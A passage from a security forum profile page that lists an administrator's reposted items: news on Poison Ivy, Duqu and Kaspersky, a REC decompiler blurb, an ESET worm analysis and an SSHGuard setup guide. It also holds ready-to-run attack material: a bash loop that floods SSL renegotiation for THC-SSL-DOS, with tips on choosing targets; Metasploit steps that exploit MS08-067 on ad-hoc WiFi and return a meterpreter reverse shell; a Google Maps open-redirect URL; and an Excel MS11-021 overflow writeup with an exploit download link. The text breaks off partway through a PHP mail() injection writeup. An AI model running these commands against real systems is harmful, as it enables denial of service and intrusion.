Jump to content

Nytro

Administrators
  • Posts

    18791
  • Joined

  • Last visited

  • Days Won

    741

Everything posted by Nytro

  1. THC-SSL-DOS It's not as elegant as the private thc-ssl-dos but works quite well indeed. 2 simple commands in bash: -----BASH SCRIPT BEGIN----- thc-ssl-dosit() { while :; do (while :; do echo R; done) | openssl s_client -connect 127.0.0.1:443 2>/dev/null; done } for x in `seq 1 100`; do thc-ssl-dosit & done -----BASH SCRIPT END------- ______________ ___ _________ \__ ___/ | \ \_ ___ \ | | / ~ \/ \ \/ | | \ Y /\ \____ |____| \___|_ / \______ / \/ \/ http://www.thc.org THC-SSL-DOS is a tool to verify the performance of SSL. Establishing a secure SSL connection requires 15x more processing power on the server than on the client. THC-SSL-DOS exploits this asymmetric property by overloading the server and knocking it off the Internet. This problem affects all SSL implementations today. The vendors are aware of this problem since 2003 and the topic has been widely discussed. This attack further exploits the SSL secure Renegotiation feature to trigger thousands of renegotiations via single TCP connection. Download: Windows binary: thc-ssl-dos-1.4-win-bin.zip Unix Source : thc-ssl-dos-1.4.tar.gz Use "./configure; make all install" to build. Usage: ./thc-ssl-dos 127.3.133.7 443 Handshakes 0 [0.00 h/s], 0 Conn, 0 Err Secure Renegotiation support: yes Handshakes 0 [0.00 h/s], 97 Conn, 0 Err Handshakes 68 [67.39 h/s], 97 Conn, 0 Err Handshakes 148 [79.91 h/s], 97 Conn, 0 Err Handshakes 228 [80.32 h/s], 100 Conn, 0 Err Handshakes 308 [80.62 h/s], 100 Conn, 0 Err Handshakes 390 [81.10 h/s], 100 Conn, 0 Err Handshakes 470 [80.24 h/s], 100 Conn, 0 Err Comparing flood DDoS vs. SSL-Exhaustion attack: A traditional flood DDoS attack cannot be mounted from a single DSL connection. This is because the bandwidth of a server is far superior to the bandwidth of a DSL connection: A DSL connection is not an equal opponent to challenge the bandwidth of a server. This is turned upside down for THC-SSL-DOS: The processing capacity for SSL handshakes is far superior at the client side: A laptop on a DSL connection can challenge a server on a 30Gbit link. Traditional DDoS attacks based on flooding are sub optimal: Servers are prepared to handle large amount of traffic and clients are constantly sending requests to the server even when not under attack. The SSL-handshake is only done at the beginning of a secure session and only if security is required. Servers are _not_ prepared to handle large amount of SSL Handshakes. The worst attack scenario is an SSL-Exhaustion attack mounted from thousands of clients (SSL-DDoS). Tips & Tricks for whitehats 1. The average server can do 300 handshakes per second. This would require 10-25% of your laptops CPU. 2. Use multiple hosts (SSL-DOS) if an SSL Accelerator is used. 3. Be smart in target acquisition: The HTTPS Port (443) is not always the best choice. Other SSL enabled ports are more unlikely to use an SSL Accelerator (like the POP3S, SMTPS, ... or the secure database port). Counter measurements: No real solutions exists. The following steps can mitigate (but not solve) the problem: 1. Disable SSL-Renegotiation 2. Invest into SSL Accelerator Either of these countermeasures can be circumventing by modifying THC-SSL-DOS. A better solution is desireable. Somebody should fix this. Yours sincerely, The Hackers Choioce #!/bin/the hacker's choice - THC Sursa: http://www.thc.org/thc-ssl-dos/
  2. 'Poison Ivy' Kit Enables Easy Malware Customization for Attackers By Brian Prince on November 03, 2011 It is no secret malware kits have been the source of many of the infections plaguing users in recent years. This trend is epitomized by Poison Ivy, a remote administration tool (RAT) at the heart of the Nitro attacks targeting the chemical and defense industries. In a new research paper, Microsoft chronicled how Poison Ivy works and why it continues to be utilized by attackers. For one thing, the tool is available for free. “Poison Ivy has an official website from which the kit is distributed. It is also available on a variety of underground websites and forums,” according to the Microsoft report. “This free and open distribution is growing increasingly uncommon as the malware authors of today tend to operate exclusively within their trusted circles and sell their creations to the highest bidders.” According to Microsoft, Poison Ivy uses a client/server architecture to essentially turn victim machines into “servers” that operators can then connect to and remotely control. “The malware is considered a kit because operators can configure the server application to their liking before generating a server assembly that is then distributed and covertly installed on victim systems,” the Microsoft researchers wrote in the paper. “These server assemblies are very small (generally between 7 KB and 10 KB). The kit also contains a “client” component that a controller can use to remotely access and control compromised systems.” Once on an infected system, the malware enables an attacker to download and upload files remotely, log keystrokes, inject malicious code and perform other malicious activities. The malware is distributed in a variety of ways, from software vulnerabilities to phishing e-mails, with the latter being how Poison Ivy infiltrated RSA earlier this year. Poison Ivy was also linked to the GhostNet spy operation uncovered in 2009, as well as the Nitro attacks recently publicized by Symantec. “With Poison Ivy there's the option to pay the author for customized versions,” Roel Schouwenberg, senior researcher at Kaspersky Lab, told SecurityWeek. “However, we believe that in these APT-style attacks the attackers customize Poison Ivy themselves.” Officials at Microsoft said the company has removed Poison Ivy from some 16,000 infected machines as of last month. In the report, researchers note the United States has been the hardest hit in 2011, accounting for 12 percent of infections. Second and third on the list are Korea and Spain, which registered nine and seven percent, respectively. The Microsoft paper can be downloaded here: http://www.microsoft.com/download/en/details.aspx?displaylang=en&id=27871 Sursa: https://www.securityweek.com/poison-ivy-kit-enables-easy-malware-customization-attackers Problema e urmatoarea: astia s-au trezit dupa 3 ani ca exista astfel de "kit"-uri?
  3. REC - Reverse Engineering Compiler Features As mentioned, Rec Studio 4 is still under development. Most target independent features have been completed, such as: Multihost: Rec Studio runs on Windows XP/Vista/7, Ubuntu Linux, Mac OS X. Symbolic information support using Dwarf 2 and partial recognition of Microsoft's PDB format. C++ is partially recognized: mangled names generated by gcc are demangled, as well as inheritance described in dwarf2 is honored. However, C++ is a very broad and difficult language, so some features like templates won't likely be ever supported. Types and function prototype definitions can be specified in text files. Some standard Posix and Windows APIs are already provided in the Rec Studio package. Interactivity is supported, limited to definition of sections, labels and function entry points. Will need to improve it to support in-program definition of types and function parameters. Although REC can read Win32 executable (aka PE) files produced by Visual C++ or Visual Basic 5, there are limitations on the output produced. REC will try to use whatever information is present in the .EXE symbol table. If the .EXE file was compiled without debugging information, if a program data base file (.PDB) or Codeview (C7) format was used, or if the optimization option of the compiler was enabled, the output produced will not be very good. Moreover, Visual Basic 5 executable files are a mix of Subroutine code and Form data. It is almost impossible for REC to determine which is which. The only option is to use a .cmd file and manually specify which area is code and which area is data. In practice, only C executable files produce meaningful decompiled output. Download: http://www.backerstreet.com/rec/recdload.htm
  4. Exploiting “Free Public WiFi” Posted by Skyler on November 2, 2011 – 12:05 pm A few weeks ago Joshua Wright did a SANS webcast on Exploiting Modern Wireless Networks. For a long time WiFi attacks have focused on either cracking WEP, or brute forcing a WPA shared key. Josh goes over some of the new attack vectors against wireless and how you can use them in a penetration test. My favorite slide had to do with that obscure “Free Public WiFi” SSID that we see all over the place. I see these all the time at airports, but also at hotels and other commonly utilized public wifi areas. Apparently this is the default name for ad-hoc networks that are created by Windows XP SP2. Obviously this gets us excited ( MS 08-067). If they are running an XP SP2 box, we can probably assume that the machine is not frequently administered, and most likely not patched. Here are the simple steps that Josh Wright provided in order to exploit this machine: Connect to the adhoc network # iwconfig wlan1 essid "Free Public WiFi" mode adhoc Use tcpdump to find the IP (bolded IP below) of the XP box hosting the ad hoc network. Note: the hosting box will be broadcasting NetBIOS packets to help configure associated clients. # tcpdump -ni wlan1 -s0 -nt IP 169.254.131.118.138 > 169.254.255.255.138: NBT UDP PACKET(138) Configure your IP (for the reverse shell to shovel back to) # ifconfig wlan1 196.254.1.1 netmask 255.255.0.0 Own It # msconsole # use exploit/windows/smb/ms08_067_netapi # set PAYLOAD windows/meterpreter/reverse_tcp # set LPORT 9999 # set RHOST 169.254.131.118 # set LHOST 169.254.1.1 # exploit Pretty straight forward, huh? As always, thanks to the SANS teams for their awesome contributions to the security industry. Make sure to check out the new SANS Pen Testing blog! its fantastic! Sursa: http://securityreliks.securegossip.com/2011/11/exploiting-free-public-wifi/
  5. As Hacking Increases, Being Anonymous Getting Harder Anonymous isn’t so anonymous anymore. Companies like Sony will continue to witness more breaches of their virtual networks until top level executives start taking hackers, and the cyber gangs that run many of them, as seriously as they take their client base. Not only do Sony PlayStation gamers want their IDs and internet protocol addresses kept secret, companies like Sony want their computer systems, housing thousands of sacred corporate data, protected just the same. In the tug of war between software security and cyber criminals, the red ribbon on the rope is still squarely in the middle, which means this is one battle the security guys have not fully won. In fact, it is doubtful that they ever will. For every malware companies like Kaspersky Lab have destroyed, two more have popped up in its place. Tim Armstrong, a virus researcher at the Massachusetts based headquarters of Russian IT security firm Kaspersky Lab said on the company’s website Wednesday that corporations were not doing enough to protect their data, and the personal information of their clients. “Companies have a lack of high level education that these threats are important to deal with,” he said. “Until they do, more security breaches will happen.” Sony has become the poster child of bad corporate IT. The company’s online gaming division was hacked again last month. Hacking has become somewhat glamorous. But hackers operate in different worlds. There’s thee advanced persistent threat, or APT, which is usually the mastermind of governments. There’s various cyber criminals and gangs from China to Russia who are after bank accounts and harvesting personal identities. Then there’s the new hacktivism group, like Anonymous, and even LulzSec who once said that hackers should target Sony’s PlayStation site in order to get Americans off the couch. Many companies might not understand internet security, but the backside of a security breach is often more costly than it is to set up a security wall around a product, or network; a network that a growing number of corporate customers are linked into through QR codes and, of course, the now famous “cloud” of virtual networks that are making personal hard drives obsolete. On Oct. 21, I spoke with Kaspersky Lab analyst Sergey Golovanov about the latest security threats from the APTs to botnets, and whether or not the top three software security firms had it under control. Rapoza: Your CEO Eugene Kaspersky says computer networks are increasingly under attack. Is it getting worse? Golovanov: I think we all have the malicious security issues under control at present. But if individuals and companies do not see just how big of a problem these code writers are becoming, and if they let their guard down, then the malware writers will definitely win. All the world is connected by computers. Your electric power is run by computer networks. Stuxnet, a worm IT security analysts found last year, shut down all of Iran’s electricity. If we are talking about a common user, whether a company or a personal computer or smart phone, malware writers can do anything they want with the data they mine from a network. They will still your data. They will steal your money. They will steal your identity. It is becoming a bigger problem. Experts at Kaspersky Lab are continuing an ongoing investigation into what has become the biggest malware program to date, known as Duqu. Golovanov said last month that Duqu shares some characteristics with the infamous Stuxnet worm that targeted industrial installations in Iran. Though the ultimate objective of the creators of this new cyber threat is still unknown nearly two months later, what is clear is that Duqu is being used for carrying out targeted attacks on a limited number of objects, included those in Iran. Commenting on the new findings, Alexander Gostev, Chief Security Expert at Kaspersky Lab, was quoted saying on the company’s website: “Despite the fact that the location of the systems attacked by Duqu are located in Iran, to date there is no evidence of their being industrial or nuclear program-related systems (like Stuxnet). As such, it is impossible to confirm that the target of the new malicious program is the same as that of Stuxnet. Nevertheless, it is clear that every infection by Duqu is unique. This information allows one to say with certainty that Duqu is being used for targeted attacks on pre-determined objects.” Duqu is most likely an APT. That type of program isn’t going to hack into a person’s X Box Live account, or their Android. In fact, the malware gunning for Microsoft and Google networks are numerous and potentially just as damaging. Not only does a company, like Sony, start to lose credibility in its fight against cybercrime, but smartphones running Android are more susceptible to attacks than iPhones. Bad for Google. Great for Apple. All told, on computer devices running Kaspersky Lab security software alone, 213,602,142 network attacks were blocked. Over 263 million malware programs were detected and neutralized. By comparison, in August 193.9 million network attacks were blocked and 258 million malware programs were detected and eliminated. That’s just on machine’s running Kaspersky Lab IT software, so the number is actually much bigger when considering devices using Symantec’s Norton brand security products and McAfee. KR: What’s making Android more attractive to hackers than iPhone? SG: We haven’t found any iPhone malware yet. Everyone is looking for the Android users and that’s probably because the iPhone is a closed operating system and the Android is an open operating system so it is easier to create malicious software for them. KR: The new quick response (QR) codes, those crazy scanable boxes you see with scrambled crossword puzzle-like squares inside on everything from the local newspaper to a box of cereal now; they seem to be the new favorite of hackers. How do they work and how do you stop them? SG: You can use security software applications to stop them, for the most part. The first known instance of QR code malware we found in Russia in September. Russians thought they were downloading a new Android app called Jimm, but instead when they swiped their phone over that bar code it ended up sending numerous text messages to a long distance number that they had to pay for. We’ve found a few of them in Russia and know who is spreading them and who is making them. KR: Who is it? SG: It’s a hacker network in Russia. Mostly Russian. The Russians are like the project managers of the group and the QR codes are just spread out through malware writers within that network through blogs or on news websites that were hacked. The code brings users to a fake application. It’s all about exploiting people, and once you’re infected, the hackers have your phone number and can access info on your smartphone. KR: What’s a recent malware program you guys helped neutralize? SG: The Hlux botnet. We did that with Microsoft mostly. We were tracking it since early in the year. It was mostly steeling personal data, phising, spamming and sending out denial of service attacks on computers. We have full control over it now and are working with U.S. law enforcement on the case. The roots of the operation is in the U.S., but we are pretty sure their base of operations is in Russia. KR: How do you stay on top of hacker groups? SG: We infiltrate their online chat forums, especially through the invisible web or by using Tor, an anonymous network where hackers like LulzSec and Anonymous often hang out. KR: A black market internet. Deep cover cyberspace. That’s as anonymous as you get, I guess. SG: Yes. We’re in there. We have to weed through a lot of nonsense, but you can get a sense of what those groups are doing in that hidden internet. They’re usually up to no good. Sursa: http://www.forbes.com/sites/kenrapoza/2011/11/03/as-hacking-increases-being-anonymous-getting-harder/
  6. Microsoft Excel 2007 SP2 Buffer Overwrite Exploit Abysssec Research 1) Advisory information Title : Microsoft Excel 2007 SP2 Buffer Overwrite Vulnerability Analysis : Abysssec.com Vendor : Microsoft Corporation: Software, Smartphones, Online, Games, Cloud Computing, IT Business Technology, Downloads Impact : Critical Contact : info [at] abysssec.com Twitter : @abysssec Microsoft : A remote code execution vulnerability exists in the way that Microsoft Excel handles specially crafted Excel files. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. each excel file can contain multiple BOF (2057) records . This record specifies the first substream associated with workbook. One of the fields in these records, specify substream recordd to come with. This field can be extracted from sub_3018F0C2 function. .text:301A0C87 push [ebp+arg_2C] .text:301A0C8A mov ecx, [ebp+var_14] .text:301A0C8D push 1 .text:301A0C8F call sub_3018F0C2 .text:301A0C94 mov ecx, eax .text:301A0C96 mov eax, [ebp+arg_24] .text:301A0C99 cmp eax, ebx .text:301A0C9B mov [ebp+var_10], ecx .text:301A0C9E jz short loc_301A0CA2 .text:301A0CA0 mov [eax], ecx If the field value is equal with 400, sub_3019DFBA function is called to check file type. if file type is xls EXCEL.exe will display a message If approved it will continue to run the code.if you change file extension to xlb there will be any message. After this step sub_3053F626 function will be executed. This function will parse the next BOF records. .text:304D4E9D cmp [ebp+arg_20], ebx .text:304D4EA0 jnz short loc_304D4EC6 .text:304D4EA2 test dword ptr word_30EDCF9C, 2000000h .text:304D4EAC jnz short loc_304D4EC6 .text:304D4EAE mov edx, [ebp+arg_C] .text:304D4EB1 mov ecx, [ebp+arg_8] .text:304D4EB4 push 3Fh .text:304D4EB6 call sub_3019DFBA .text:304D4EBB cmp eax, ebx .text:304D4EBD mov [ebp+var_8], eax .text:304D4EC0 jz loc_304D4FD3 .text:304D4EC6 .text:304D4EC6 loc_304D4EC6: ; CODE XREF: sub_301A0BC7+3342D9j .text:304D4EC6 ; sub_301A0BC7+3342E5j .text:304D4EC6 push ebx .text:304D4EC7 push dword_30EB89A4 .text:304D4ECD push [ebp+var_C] .text:304D4ED0 call sub_3053F626 .text:304D4ED5 cmp dword_30F5E64C, ebx .text:304D4EDB mov [ebp+var_8], eax .text:304D4EDE jz short loc_304D4EE7 .text:304D4EE0 cmp eax, ebx .text:304D4EE2 jz short loc_304D4EE7 one of records may come after BOF,is undocumented record which have record type equal to 0xA7 (167). for truly parsing this record should come with another record with 0x3C (60) record type. if it meet this requirement the length of records will be read and copied to the stack. the function which operation of copying data records in the stack is sub_30199E55. This function takes three arguments. The first argument specifies the number of bytes to copy, which will read from file. The second argument specifies the destination of the copy and the third argument specifies the maximum amount of data can be copied. values of the second and third arguments based on the amount of computing reading from file and into this cumpoting,computational error which may occur here ... .text:3053F830 call sub_301A0A01 .text:3053F835 cmp eax, 3Ch .text:3053F838 mov [ebp+var_ED4], eax .text:3053F83E jnz loc_30540488 .text:3053F844 call sub_301A0A01 .text:3053F849 mov ecx, [ebp+var_EDC] .text:3053F84F imul ecx, [ebp+var_F00] .text:3053F856 mov edi, eax .text:3053F858 mov eax, [ebp+var_EE0] .text:3053F85E lea ebx, [ecx+eax+3] .text:3053F862 call sub_301A0ABE .text:3053F867 push 0FFFFFFFDh .text:3053F869 pop edx .text:3053F86A sub edx, ecx .text:3053F86C add eax, edx .text:3053F86E push eax ; Dst .text:3053F86F push ebx ; int .text:3053F870 mov eax, edi .text:3053F872 call sub_30199E55 the vulnerability that exists here is that we can change the value of parameter 3 whith our own values. program will not correcly controll third argument of sub_30199E55 this and can result in the desired amount and location of desired data can overwrite in the stack. .text:30199E60 cmp edi, [esp+4+Dst] .text:30199E64 ja loc_303EE1B7 .text:30199E6A mov ecx, [esp+4+arg_0] .text:30199E6E push ebx .text:30199E6F mov ebx, dword_30F726C0 .text:30199E75 push ebp .text:30199E76 mov ebp, nNumberOfBytesToRead .text:30199E7C push esi .text:30199E7D mov [esp+10h+Dst], ecx .... .text:30199E93 mov eax, [esp+10h+Dst] .text:30199E97 push esi ; Size .text:30199E98 lea edx, dword_30F6E6B8[ebx] .text:30199E9E push edx ; Src .text:30199E9F push eax ; Dst .text:30199EA0 sub edi, esi .text:30199EA2 call memcpy .text:30199EA7 add [esp+1Ch+Dst], esi .text:30199EAB add ebx, esi .text:30199EAD add esp, 0Ch .text:30199EB0 test edi, edi .text:30199EB2 mov dword_30F726C0, ebx .text:30199EB8 jnz loc_301E0DB3 Exploiting : Stack overflows are not hard to exploit at all ! but as we have both /GS , SAFESEH here. because given that we are destined to memcpy we can change it so that it begins to overwrite the stack after GS. and from there when the return comes , our values contained in the ESP and we can call it with simple call esp and game is over !!! Exploit can be download from here : http://www.abysssec.com/blog/wp-content/uploads/2011/11/MS11-021.zip EDB mirror : http://www.exploit-db.com/sploits/18067.zip Sursa: Microsoft Excel 2007 SP2 Buffer Overwrite Exploit
  7. Made in the Czech Republic: a PHP Autorun worm November 3, 2011 at 7:21 am Recently, a new data-stealing worm caught our attention. The reason why it stands out from many similar amateur creations is that its author is most probably Czech, as the text strings, variable and function names used by the malware suggest. The Czech text above is displayed by the worm inside a console window and translates to: “Initializing. This operation can take several minutes. Please wait…”, pretending to be a message from Microsoft. But wait, variable and function names used by the programmer? Those aren’t normally seen in a compiled binary unless we have the associated PDB file (Program DataBase: a file format commonly created at compile-time that may list symbols that aren’t stored in the compiled module itself). But in this case, the worm is written entirely in PHP and “converted” to a PE file using the Bambalam PHP EXE Compiler/Embedder. This embedder simply encodes the PHP source files using Turck MMCache and then adds the resulting PHP bytecode as resources in a launcher binary. By decoding these, we were able to get a fairly accurate view of the original source code. So let’s take a look at what the malware actually does… Installation and Spread Firstly, we classify it as a worm, as it contains methods for spreading itself. In order to replicate through removable media and modify the infected system to ensure persistence, i.e. that it gets relaunched subsequently, the worm copies its body to the following locations: The root directory of all mounted volumes, except A: and B:. If the drive size is less than ~32GB, the autorun.inf file is also dropped in the hope of exploiting the (at last!) deprecated AutoRun feature of Windows. The Documents, Desktop, Start Menu, Start Menu\Programs and Start Menu\Programs\Startup folders for each user on the system and to the All Users Start Menu\Programs folder. Note that the worm can only copy itself to folders belonging to other users if the worm is run by an administrator account. Also, due to the change of folder naming from Windows Vista onwards, the worm is only able to copy itself to some of the listed folders on earlier Windows systems (such as XP) if it’s a Czech version of the OS. For each of the above mentioned locations, the worm randomly chooses one of the following innocuous-looking file names: setup.exe install.exe fotky.exe majkl_dzeksn.exe barunka.exe martinka.exe Harvesting data The purpose of the worm is to collect a large set of sensitive user data and system information, including: Messages and other information from various IM clients (such as QIP, ICQ, Digsby) Saved passwords and other information from various browsers (such as IE, Mozilla Firefox, Opera, Chrome) Saved passwords from common email clients (such as Outlook, Windows Mail, Yahoo! Mail or Gmail) Emails and other information from various email clients (such as Outlook, Outlook Express, Mozilla Thunderbird) Total Commander FTP passwords Stored Windows credentials Windows Address Book contacts Windows User account properties (excluding password) Network addresses, open connections, tables and statistics List of running processes and services Environment variables List of all user files and directories List of recently opened documents Contents of the Registry MS Windows and MS Office Product Keys The list of types of data that the worm harvests from the infected machine is quite long, and they are all gathered using various unsophisticated methods. In order to collect most of the data associated with Instant Messaging applications, browsers, and so on, the worm simply uploads all the files from the installation folders of the respective applications. For information related to Windows user accounts, network connections, running processes, and the Windows Registry, the following shell commands are used: net user ipconfig netstat arp tasklist regedit Another method employed for collecting the victim’s data is the use of third-party password-extraction utilities by NirSoft. The worm’s binary drops and executes four of these tools and sends their output back to the attacker. The worm uses a simple mechanism for sending the collected data to the remote server. It sends many HTTP POST requests (port 80) containing the stolen data gz-compressed and Base64 encoded. As you can see from the description above, the worm lacks the sophistication of some of the more advanced malware that we sometimes see. Yet, unfortunately, even these simple threats often get the job done. Given the very low prevalence of this malware, the fact that at the time of this writing 100% of the detections came from the Czech Republic, and its apparent Czech origin, there is a possibility that this tool was used in a targeted attack on a specific victim. Or it may just have been an experiment by an amateur malware-writer. Or both. ESET detects this worm as Win32/AutoRun.PSW.Agent.E. The malware analysis was done by Jakub Horky. Robert Lipovsky Malware Researcher Sursa: http://blog.eset.com/2011/11/03/made-in-the-czech-republic-a-php-autorun-worm
  8. Protect your server with SSHGuard I’ve already talked about fail2ban and logcheck, 2 tools that can scan your logs and do actions, based on rules that you can give/modify, usually modify your iptables rules to stop active attacks against your server or simply send you a warning if some thing is found in the logs. Today we’ll see a similar tool, sshguard, it is different from the other two in that it is written in C, so it’s uses less memory and CPU while running, but still achiving the same results. So what does sshguard do? The short version is: it receives log messages, it detects when a networked service has been abused based on them, and blocks the address of who abused it; after some time, it releases the blocking. The full version is: sshguard runs on a machine as a small daemon, and receives log messages (in a number of ways, e.g. from syslog). When it determines that address X did something bad to service Y, it fires a rule in the machine’s firewall (one of the many supported) for blocking X. Sshguard keeps X blocked for some time, then releases it automatically. Please note that despite of his name sshguard detects attacks for many services out of the box, not only SSH but also several ftpds, Exim and dovecot. It can operate all the major firewalling systems, and features support for IPv6, whitelisting, suspension, and log message authentication Installation Sshguard is distributed under the permissive BSD license: you can use, modify and redistribute the software, at your own risk, for any use, including commercial, provided that you retain the original copyright notice you find in it. The software is distributed in the main repository of the most used GNU/Linux distributions and for some *BSD system, but you can also download the sources from their downlaod page. To install it on Debian (or other .deb distributions like Ubuntu) just run from a terminal: sudo aptitude install sshguard Setup and configuration Sshguard interfaces to the system in two points: the logging system (how sshguard receives log messages to monitor) the firewall (how sshguard blocks naughty addresses) Since version 1.5, sshguard comes with the Log Sucker. With the Log Sucker, SSHGuard fetches log entries proactively, and handles transparently events like rotated log files and files disappearing and reappearing. In the official documentation page there are instructions for many different firewalls, i’ll follow the instructions for netfilter/iptables. sshguard does not have a configuration file. All configuration that has to be done is creating a chain named “sshguard” in the INPUT chain of iptables where sshguard automatically inserts rules to drop packets coming from bad hosts: # for regular IPv4 support: iptables -N sshguard # if you want IPv6 support as well: ip6tables -N sshguard Now update the INPUT chain so it can pass all the traffic to sshguard, specify with -dport all the ports of services that you want to protect with sshguard. If you want to prevent attackers from doing any traffic to the host, remove the option completely: # block any traffic from abusers iptables -A INPUT -j sshguard ip6tables -A INPUT -j sshguard -- or -- # block abusers only for SSH, FTP, POP, IMAP services (use "multiport" module) iptables -A INPUT -m multiport -p tcp --destination-ports 21,22,110,143 -j sshguard ip6tables -A INPUT -m multiport -p tcp --destination-ports 21,22,110,143 -j sshguard If you do not currently use iptables and just want to get sshguard up and running without any further impact on your system, these commands will create and save an iptables configuration that does absolutely nothing except allowing sshguard to work: # iptables -F # iptables -X # iptables -P INPUT ACCEPT # iptables -P FORWARD ACCEPT # iptables -P OUTPUT ACCEPT # iptables -N sshguard # iptables -A INPUT -j sshguard # /etc/rc.d/iptables save Conclusions And that’s all you need to do to have a basic installation of sshguard up and running, it will help you to have your ssh, ftp and other daemons a bit more secure. Sursa: http://linuxaria.com/recensioni/protect-your-server-with-sshguard?lang=en
  9. Poate util unora: *# Date:* 2.11.2011 *# Author:* Sony *# Blog : st2tea http://maps.google.com/m/preferences?pref=s&bl=//st2tea.blogspot.com&hl=1&safe=strict&safe=images&safe=off&gwt=on&gwt=off&lochist=on&lochist=off&sigp=pref%20bl&sig=AMctaOIRgcTAHYXz1KuVsPHwVpqFKrQCJg or http://maps.google.com/m/preferences?pref=s&bl=//%73%74%32%74%65%61%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D&hl=1&safe=strict&safe=images&safe=off&gwt=on&gwt=off&lochist=on&lochist=off&sigp=pref%20bl&sig=AMctaOIRgcTAHYXz1KuVsPHwVpqFKrQCJg Mirror: Google Maps Open Redirect ? Packet Storm Sursa: st2tea: Google Maps Open Redirect
  10. Vulnerability Assessment vs Penetration Testing Few topics in the infosec world create as much heat as the classic "vulnerability assessment vs. penetration test” debate, and it’s no different in the web application security space. Sadly, the discussion isn’t usually around which is better. That would actually be an improvement. Instead the debate is usually semantic in nature, i.e. the flustered participants are usually disagreeing on what the terms actually mean. Step 1: agree on terms. So, I’ll be ambitious here and will tackle both subcomponents of the debate here: 1) what the terms actually mean, and 2) which is better for organizations to pursue. Web Vulnerability Assessment vs. Web Penetration Test It’s worth stating explicitly that these two types of security test are in fact quite different. Many make the mistake of thinking that a penetration test is simply a vulnerability assessment with exploitation, or that a vulnerability assessment is a penetration test without exploitation. This is incorrect. If that were the case then we’d simply have one term that we’d qualify with “with or without exploitation". A web application vulnerability assessment is fundamentally different from a penetration because its focus is on creating a list of as many findings as possible for a given web application. A penetration test, on the other hand, has a completely different purpose. Rather than yield a list of problems, a penetration test’s focus is the achievement of a specific goal set by the customer, e.g. "dump the customer database", or "become an administrative user within the application". Also important to note is the fact that a penetration test is successful if and when the goal is acheived–not when a massive list of vulnerabilities is produced. That’s what a vulnerability assessment is for. Some are tempted to say that this is a goal-based penetration test. My question to them is simple: "As opposed to what other type?" Penetration testing is goal-based. That’s its entire purpose. Even a customer direction as nebulous as "see what you can do" is absolutely a goal. It’s an implicit goal of getting as far as you can given whatever constraints are in place. The question of exploitation is another obstacle to clarity on this topic. Many have a simple binary switch for using the terms: "If there’s exploitation it’s a penetration test and if not it’s a vulnerability assessment." Again, the key difference here is list-based vs. goal-based–not exploitation. It’s possible do do (or not do) exploitation in both types of test. You can have a web vulnerability assessment where you are to exploit anything you find, and you can have a penetration test where you are asked to confirm that you can do something but not do it. Exploitation is an independent attribute that can be attached to either type of test. When to Use One vs. the Other Now that we see a distinction between terms, the next question is, "Which one is best?" Which should we be offering customers? As you may expect, the answer is that it depends on the customer and the project, but in my experience the answer will usually end up being a vulnerability assessment. Why? Because vulnerability assessments (getting a list of everything that needs fixing) is usually where most customers are in terms of maturity. To tightly summarize: via h30499.www3.hp.com Daniels dissertation on this matter is excellent. As the security landscape changes we will see more actual pentests occur, but right now most of what your testers are doing are assessments sold as pentests. That isn’t a bad thing. Pentesting is sexy because it has been market that way, not necessarily because it is better (or even a more fun project to work on) but because it fits a FUD marketing niche. When I DO do a an actual penetration test I prefer pentests with open goals that, within context to a business, my team can go after what they think effects the business the most. It’s an important distinction that what the business "thinks" is the crown jewels and keeps them in running (or is most valuable) is not actually what can hurt them the most. Some of our best attacks have been side channel, crazy things that have shown some of our awesome customers better ways to secure themselves. Assessments and Pentests will probably continue to be muddled terms hacked together by sales guys who work for bad consultancies for years to come. It’s important to testers and PM’s to know the real differences though. There is an even longer version of this discussion on his blog (http://danielmiessler.com/writing/va_vs_pt/#). November 2, 2011 Jhaddix Sursa: http://www.securityaegis.com/vulnerability-assessment-vs-penetration-testing/
  11. Using mail() for Remote Code Execution Submitted by geoffrey on Thu, 11/03/2011 - 15:30 Last week we had to assess the security level of a PHP web application from its source code, in a white-box context. During this audit we found original ways to take advantage of the mail() function for remote code execution and file disclosure attacks while bypassing open_basedir. This article explains the approaches used for that type of audit, how PHP handles the mail function and how to perform such attacks using it. Methodologies There are three well known approaches to audit an application from its source code. The first one is the top-down approach, which consists to start from an entry point of the program and follow all code branches. The second method is the bottom-up approach: the auditor first establishes a list of interesting functions to audit and identify code areas where user inputs are used. There are cons and pros for both methods. The first one is time consuming but covers all the source code and provides a great understanding of how the application works. The later one is time saver and focuses on areas which are the most susceptible to be vulnerable, but doesn't follow all code branches and skips some kind of vulnerabilities, for example logic issues. Note that there is also another way which combines the benefits of each methods and tries to limit their disadvantages: the hybrid method. Vulnerable code In our approach we decided to use a top-down methodology and after a few time we saw that piece of code (recreated due to confidentiality reasons) which at first glance seems normal: $mail = new sendMail; $mail->setTo(input::post('to')); $mail->setSubject(input::post('subject')); $mail->setFrom(input::post('from')); $mail->setMessage(input::post('message')); $mail->send(); The method input::post is in fact a simple wrapper to get values from the $_POST array, controlled by the user. Next the setFrom function is called, which looks like the following: if (preg_match('#^[a-zA-Z0-9_.-]+@[a-zA-Z0-9-]+.[a-zA-Z0-9-.]+#', $from)) $this->from = (string) $from; The meta-character $ is not used, so the check made with preg_match can be bypassed cause the regex will only be applied on the first part of the subject, not all of it. After setting different parameters, the send function is executed: mail($this->to, $this->subject, $this->message, ..., "-f{$this->from}"); We can see that the variable from, controlled by the user, is passed to the fifth parameter of the mail function. Analysing mail() Using Reflection from the shell we can quickly know how the mail function works: php --rf mail Function [ <internal:standard> function mail ] { - Parameters [5] { Parameter #0 [ <required> $to ] Parameter #1 [ <required> $subject ] Parameter #2 [ <required> $message ] Parameter #3 [ <optional> $additional_headers ] Parameter #4 [ <optional> $additional_parameters ] } } In our case we control several parameters passed to mail but the more interesting seems to be the fifth one. Quoting php.net: The additional_parameters parameter can be used to pass additional flags as command line options to the program configured to be used when sending mail, as defined by the sendmail_path configuration setting. For example, this can be used to set the envelope sender address when using sendmail with the -f sendmail option. What we want to know now is how the command line options are passed to sendmail. For example we could try to exploit an escape shell vulnerability or abuse sendmail options. In order to do so we downloaded the PHP 5.3.0 source code and found that the code which handles mail is situated in ext/standard/mail.c: /* {{{ proto int mail(string to, string subject, string message [, string additional_headers [, string additional_parameters]]) Send an email message */ PHP_FUNCTION(mail) { char *to=NULL, *message=NULL, *headers=NULL; char *subject=NULL, *extra_cmd=NULL; int to_len, message_len, headers_len = 0; int subject_len, extra_cmd_len = 0, i; char *force_extra_parameters = INI_STR("mail.force_extra_parameters"); char *to_r, *subject_r; char *p, *e; if (PG(safe_mode) && (ZEND_NUM_ARGS() 